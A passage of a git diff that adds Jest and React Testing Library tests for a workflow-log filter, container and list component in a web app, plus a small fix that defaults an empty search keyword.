expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + expect(screen.getByDisplayValue('integration test')).toBeInTheDocument() + }) + + it('should have proper layout with flex and gap', () => { + const { container } = render( + , + ) + + const filterContainer = container.firstChild as HTMLElement + expect(filterContainer).toHaveClass('flex') + expect(filterContainer).toHaveClass('flex-row') + expect(filterContainer).toHaveClass('gap-2') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/filter.tsx b/web/app/components/app/workflow-log/filter.tsx index 0c8d72c1be..a4db4c9642 100644 --- a/web/app/components/app/workflow-log/filter.tsx +++ b/web/app/components/app/workflow-log/filter.tsx @@ -65,7 +65,7 @@ const Filter: FC = ({ queryParams, setQueryParams }: IFilterProps) wrapperClassName='w-[200px]' showLeftIcon showClearIcon - value={queryParams.keyword} + value={queryParams.keyword ?? ''} placeholder={t('common.operation.search')!} onChange={(e) => { setQueryParams({ ...queryParams, keyword: e.target.value }) diff --git a/web/app/components/app/workflow-log/index.spec.tsx b/web/app/components/app/workflow-log/index.spec.tsx new file mode 100644 index 0000000000..e6d9f37949 --- /dev/null +++ b/web/app/components/app/workflow-log/index.spec.tsx @@ -0,0 +1,592 @@ +/** + * Logs Container Component Tests + * + * Tests the main Logs container component which: + * - Fetches workflow logs via useSWR + * - Manages query parameters (status, period, keyword) + * - Handles pagination + * - Renders Filter, List, and Empty states + * + * Note: Individual component tests are in their respective spec files: + * - filter.spec.tsx + * - list.spec.tsx + * - detail.spec.tsx + * - trigger-by-display.spec.tsx + */ + +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import useSWR from 'swr' +import Logs, { type ILogsProps } from './index' +import { TIME_PERIOD_MAPPING } from './filter' 
+import type { App, AppIconType, AppModeEnum } from '@/types/app' +import type { WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from '@/models/log' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import { APP_PAGE_LIMIT } from '@/config' + +// ============================================================================ +// Mocks +// ============================================================================ + +jest.mock('swr') + +jest.mock('ahooks', () => ({ + useDebounce: (value: T) => value, + useDebounceFn: (fn: (value: string) => void) => ({ run: fn }), + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: jest.fn(), + }), +})) + +jest.mock('next/link', () => ({ + __esModule: true, + default: ({ children, href }: { children: React.ReactNode; href: string }) => {children}, +})) + +// Mock the Run component to avoid complex dependencies +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
    + {runDetailUrl} + {tracingListUrl} +
    + ), +})) + +const mockTrackEvent = jest.fn() +jest.mock('@/app/components/base/amplitude/utils', () => ({ + trackEvent: (...args: unknown[]) => mockTrackEvent(...args), +})) + +jest.mock('@/service/log', () => ({ + fetchWorkflowLogs: jest.fn(), +})) + +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => { + const { Theme } = require('@/types/app') + return { theme: Theme.light } + }, +})) + +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + userProfile: { timezone: 'UTC' }, + }), +})) + +// Mock useTimestamp +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: (timestamp: number, _format: string) => `formatted-${timestamp}`, + }), +})) + +// Mock useBreakpoints +jest.mock('@/hooks/use-breakpoints', () => ({ + __esModule: true, + default: () => 'pc', + MediaType: { + mobile: 'mobile', + pc: 'pc', + }, +})) + +// Mock BlockIcon +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: () =>
    BlockIcon
    , +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
    {children}
    + ), +})) + +const mockedUseSWR = useSWR as jest.MockedFunction + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +const createMockWorkflowRun = (overrides: Partial = {}): WorkflowRunDetail => ({ + id: 'run-1', + version: '1.0.0', + status: 'succeeded', + elapsed_time: 1.234, + total_tokens: 100, + total_price: 0.001, + currency: 'USD', + total_steps: 5, + finished_at: Date.now(), + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + ...overrides, +}) + +const createMockWorkflowLog = (overrides: Partial = {}): WorkflowAppLogDetail => ({ + id: 'log-1', + workflow_run: createMockWorkflowRun(), + created_from: 'web-app', + created_by_role: 'account', + created_by_account: { + id: 'account-1', + name: 'Test User', + email: 'test@example.com', + }, + created_at: Date.now(), + ...overrides, +}) + +const createMockLogsResponse = ( + data: WorkflowAppLogDetail[] = [], + total = data.length, +): WorkflowLogsResponse => ({ + data, + has_more: data.length < total, + limit: APP_PAGE_LIMIT, + total, + page: 1, +}) + +// 
============================================================================ +// Tests +// ============================================================================ + +describe('Logs Container', () => { + const defaultProps: ILogsProps = { + appDetail: createMockApp(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() + }) + + it('should render title and subtitle', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() + expect(screen.getByText('appLog.workflowSubtitle')).toBeInTheDocument() + }) + + it('should render Filter component', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Loading State Tests + // -------------------------------------------------------------------------- + describe('Loading State', () => { + it('should show loading spinner when data is undefined', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + mutate: jest.fn(), + isValidating: true, + isLoading: true, + error: undefined, + }) + + const { 
container } = render() + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should not show loading spinner when data is available', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const { container } = render() + + expect(container.querySelector('.spin-animation')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Empty State Tests + // -------------------------------------------------------------------------- + describe('Empty State', () => { + it('should render empty element when total is 0', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.table.empty.element.title')).toBeInTheDocument() + expect(screen.queryByRole('table')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Data Fetching Tests + // -------------------------------------------------------------------------- + describe('Data Fetching', () => { + it('should call useSWR with correct URL and default params', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { url: string; params: Record } + expect(keyArg).toMatchObject({ + url: `/apps/${defaultProps.appDetail.id}/workflow-app-logs`, + params: expect.objectContaining({ + page: 1, + detail: true, + limit: APP_PAGE_LIMIT, + }), + }) + }) + + it('should include date filters for non-allTime periods', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + 
mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(keyArg?.params).toHaveProperty('created_at__after') + expect(keyArg?.params).toHaveProperty('created_at__before') + }) + + it('should not include status param when status is all', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(keyArg?.params).not.toHaveProperty('status') + }) + }) + + // -------------------------------------------------------------------------- + // Filter Integration Tests + // -------------------------------------------------------------------------- + describe('Filter Integration', () => { + it('should update query when selecting status filter', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Click status filter + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + // Check that useSWR was called with updated params + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).toMatchObject({ + status: 'succeeded', + }) + }) + }) + + it('should update query when selecting period filter', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Click period filter + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await 
screen.findByText('appLog.filter.period.allTime')) + + // When period is allTime (9), date filters should be removed + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).not.toHaveProperty('created_at__after') + expect(lastCall?.params).not.toHaveProperty('created_at__before') + }) + }) + + it('should update query when typing keyword', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const searchInput = screen.getByPlaceholderText('common.operation.search') + await user.type(searchInput, 'test-keyword') + + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).toMatchObject({ + keyword: 'test-keyword', + }) + }) + }) + }) + + // -------------------------------------------------------------------------- + // Pagination Tests + // -------------------------------------------------------------------------- + describe('Pagination', () => { + it('should not render pagination when total is less than limit', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Pagination component should not be rendered + expect(screen.queryByRole('navigation')).not.toBeInTheDocument() + }) + + it('should render pagination when total exceeds limit', () => { + const logs = Array.from({ length: APP_PAGE_LIMIT }, (_, i) => + createMockWorkflowLog({ id: `log-${i}` }), + ) + + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse(logs, APP_PAGE_LIMIT + 10), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Should show pagination - checking for any 
pagination-related element + // The Pagination component renders page controls + expect(screen.getByRole('table')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // List Rendering Tests + // -------------------------------------------------------------------------- + describe('List Rendering', () => { + it('should render List component when data is available', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByRole('table')).toBeInTheDocument() + }) + + it('should display log data in table', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + status: 'succeeded', + total_tokens: 500, + }), + }), + ], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('500')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // TIME_PERIOD_MAPPING Export Tests + // -------------------------------------------------------------------------- + describe('TIME_PERIOD_MAPPING', () => { + it('should export TIME_PERIOD_MAPPING with correct values', () => { + expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) + expect(TIME_PERIOD_MAPPING['2']).toEqual({ value: 7, name: 'last7days' }) + expect(TIME_PERIOD_MAPPING['9']).toEqual({ value: -1, name: 'allTime' }) + expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + 
it('should handle different app modes', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render() + + // Should render without trigger column + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + + it('should handle error state from useSWR', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: new Error('Failed to fetch'), + }) + + const { container } = render() + + // Should show loading state when data is undefined + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should handle app with different ID', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const customApp = createMockApp({ id: 'custom-app-123' }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { url: string } + expect(keyArg?.url).toBe('/apps/custom-app-123/workflow-app-logs') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/list.spec.tsx b/web/app/components/app/workflow-log/list.spec.tsx new file mode 100644 index 0000000000..be54dbc2f3 --- /dev/null +++ b/web/app/components/app/workflow-log/list.spec.tsx @@ -0,0 +1,751 @@ +/** + * WorkflowAppLogList Component Tests + * + * Tests the workflow log list component which displays: + * - Table of workflow run logs with sortable columns + * - Status indicators (success, failed, stopped, running, partial-succeeded) + * - Trigger display for workflow apps + * - Drawer with run details + * - Loading states + */ + +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from 
'@testing-library/user-event' +import WorkflowAppLogList from './list' +import { useStore as useAppStore } from '@/app/components/app/store' +import type { App, AppIconType, AppModeEnum } from '@/types/app' +import type { WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from '@/models/log' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import { APP_PAGE_LIMIT } from '@/config' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockRouterPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockRouterPush, + }), +})) + +// Mock useTimestamp hook +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: (timestamp: number, _format: string) => `formatted-${timestamp}`, + }), +})) + +// Mock useBreakpoints hook +jest.mock('@/hooks/use-breakpoints', () => ({ + __esModule: true, + default: () => 'pc', // Return desktop by default + MediaType: { + mobile: 'mobile', + pc: 'pc', + }, +})) + +// Mock the Run component +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
    + {runDetailUrl} + {tracingListUrl} +
    + ), +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
    {children}
    + ), +})) + +// Mock BlockIcon +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: () =>
    BlockIcon
    , +})) + +// Mock useTheme +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => { + const { Theme } = require('@/types/app') + return { theme: Theme.light } + }, +})) + +// Mock ahooks +jest.mock('ahooks', () => ({ + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +const createMockWorkflowRun = (overrides: Partial = {}): WorkflowRunDetail => ({ + id: 'run-1', + version: '1.0.0', + status: 'succeeded', + elapsed_time: 1.234, + total_tokens: 100, + total_price: 0.001, + currency: 'USD', + total_steps: 5, + finished_at: Date.now(), + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + ...overrides, +}) + +const createMockWorkflowLog = (overrides: Partial = {}): WorkflowAppLogDetail => ({ + id: 'log-1', + workflow_run: createMockWorkflowRun(), + created_from: 'web-app', + created_by_role: 'account', + created_by_account: { + id: 'account-1', + 
name: 'Test User', + email: 'test@example.com', + }, + created_at: Date.now(), + ...overrides, +}) + +const createMockLogsResponse = ( + data: WorkflowAppLogDetail[] = [], + total = data.length, +): WorkflowLogsResponse => ({ + data, + has_more: data.length < total, + limit: APP_PAGE_LIMIT, + total, + page: 1, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('WorkflowAppLogList', () => { + const defaultOnRefresh = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + useAppStore.setState({ appDetail: createMockApp() }) + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render loading state when logs are undefined', () => { + const { container } = render( + , + ) + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should render loading state when appDetail is undefined', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + const { container } = render( + , + ) + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should render table when data is available', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + expect(screen.getByRole('table')).toBeInTheDocument() + }) + + it('should render all table headers', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + expect(screen.getByText('appLog.table.header.startTime')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.status')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.runtime')).toBeInTheDocument() + 
expect(screen.getByText('appLog.table.header.tokens')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.user')).toBeInTheDocument() + }) + + it('should render trigger column for workflow apps', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + const workflowApp = createMockApp({ mode: 'workflow' as AppModeEnum }) + + render( + , + ) + + expect(screen.getByText('appLog.table.header.triggered_from')).toBeInTheDocument() + }) + + it('should not render trigger column for non-workflow apps', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render( + , + ) + + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Status Display Tests + // -------------------------------------------------------------------------- + describe('Status Display', () => { + it('should render success status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'succeeded' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Success')).toBeInTheDocument() + }) + + it('should render failure status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'failed' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Failure')).toBeInTheDocument() + }) + + it('should render stopped status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'stopped' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Stop')).toBeInTheDocument() + }) + + it('should render running status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + 
workflow_run: createMockWorkflowRun({ status: 'running' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Running')).toBeInTheDocument() + }) + + it('should render partial-succeeded status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'partial-succeeded' as WorkflowRunDetail['status'] }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Partial Success')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // User Info Display Tests + // -------------------------------------------------------------------------- + describe('User Info Display', () => { + it('should display account name when created by account', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_account: { id: 'acc-1', name: 'John Doe', email: 'john@example.com' }, + created_by_end_user: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('John Doe')).toBeInTheDocument() + }) + + it('should display end user session id when created by end user', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_end_user: { id: 'user-1', type: 'browser', is_anonymous: false, session_id: 'session-abc-123' }, + created_by_account: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('session-abc-123')).toBeInTheDocument() + }) + + it('should display N/A when no user info', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_account: undefined, + created_by_end_user: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('N/A')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Sorting Tests + // -------------------------------------------------------------------------- + describe('Sorting', () => { + it('should sort logs in 
descending order by default', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + createMockWorkflowLog({ id: 'log-3', created_at: 3000 }), + ]) + + render( + , + ) + + const rows = screen.getAllByRole('row') + // First row is header, data rows start from index 1 + // In descending order, newest (3000) should be first + expect(rows.length).toBe(4) // 1 header + 3 data rows + }) + + it('should toggle sort order when clicking on start time header', async () => { + const user = userEvent.setup() + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + ]) + + render( + , + ) + + // Click on the start time header to toggle sort + const startTimeHeader = screen.getByText('appLog.table.header.startTime') + await user.click(startTimeHeader) + + // Arrow should rotate (indicated by class change) + // The sort icon should have rotate-180 class for ascending + const sortIcon = startTimeHeader.closest('div')?.querySelector('svg') + expect(sortIcon).toBeInTheDocument() + }) + + it('should render sort arrow icon', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + const { container } = render( + , + ) + + // Check for ArrowDownIcon presence + const sortArrow = container.querySelector('svg.ml-0\\.5') + expect(sortArrow).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Drawer Tests + // -------------------------------------------------------------------------- + describe('Drawer', () => { + it('should open drawer when clicking on a log row', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-123' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + id: 'log-1', + workflow_run: 
createMockWorkflowRun({ id: 'run-456' }), + }), + ]) + + render( + , + ) + + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) // Click first data row + + const dialog = await screen.findByRole('dialog') + expect(dialog).toBeInTheDocument() + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should close drawer and call onRefresh when closing', async () => { + const user = userEvent.setup() + const onRefresh = jest.fn() + useAppStore.setState({ appDetail: createMockApp() }) + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Close drawer using Escape key + await user.keyboard('{Escape}') + + await waitFor(() => { + expect(onRefresh).toHaveBeenCalled() + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + }) + }) + + it('should highlight selected row', async () => { + const user = userEvent.setup() + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + const dataRows = screen.getAllByRole('row') + const dataRow = dataRows[1] + + // Before click - no highlight + expect(dataRow).not.toHaveClass('bg-background-default-hover') + + // After click - has highlight (via currentLog state) + await user.click(dataRow) + + // The row should have the selected class + expect(dataRow).toHaveClass('bg-background-default-hover') + }) + }) + + // -------------------------------------------------------------------------- + // Replay Functionality Tests + // -------------------------------------------------------------------------- + describe('Replay Functionality', () => { + it('should allow replay when triggered from app-run', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-replay' }) }) + const logs = createMockLogsResponse([ + 
createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'run-to-replay', + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should be present for app-run triggers + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).toHaveBeenCalledWith('/app/app-replay/workflow?replayRunId=run-to-replay') + }) + + it('should allow replay when triggered from debugging', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-debug' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'debug-run', + triggered_from: WorkflowRunTriggeredFrom.DEBUGGING, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should be present for debugging triggers + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toBeInTheDocument() + }) + + it('should not show replay for webhook triggers', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-webhook' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'webhook-run', + triggered_from: WorkflowRunTriggeredFrom.WEBHOOK, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should not be present for webhook triggers + expect(screen.queryByRole('button', { name: 
'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Unread Indicator Tests + // -------------------------------------------------------------------------- + describe('Unread Indicator', () => { + it('should show unread indicator for unread logs', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + read_at: undefined, + }), + ]) + + const { container } = render( + , + ) + + // Unread indicator is a small blue dot + const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') + expect(unreadDot).toBeInTheDocument() + }) + + it('should not show unread indicator for read logs', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + read_at: Date.now(), + }), + ]) + + const { container } = render( + , + ) + + // No unread indicator + const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') + expect(unreadDot).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Runtime Display Tests + // -------------------------------------------------------------------------- + describe('Runtime Display', () => { + it('should display elapsed time with 3 decimal places', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ elapsed_time: 1.23456 }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('1.235s')).toBeInTheDocument() + }) + + it('should display 0 elapsed time with special styling', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ elapsed_time: 0 }), + }), + ]) + + render( + , + ) + + const zeroTime = screen.getByText('0.000s') + expect(zeroTime).toBeInTheDocument() + expect(zeroTime).toHaveClass('text-text-quaternary') + }) + }) + + // 
-------------------------------------------------------------------------- + // Token Display Tests + // -------------------------------------------------------------------------- + describe('Token Display', () => { + it('should display total tokens', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ total_tokens: 12345 }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('12345')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Empty State Tests + // -------------------------------------------------------------------------- + describe('Empty State', () => { + it('should render empty table when logs data is empty', () => { + const logs = createMockLogsResponse([]) + + render( + , + ) + + const table = screen.getByRole('table') + expect(table).toBeInTheDocument() + + // Should only have header row + const rows = screen.getAllByRole('row') + expect(rows).toHaveLength(1) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle multiple logs correctly', () => { + const logs = createMockLogsResponse([ + 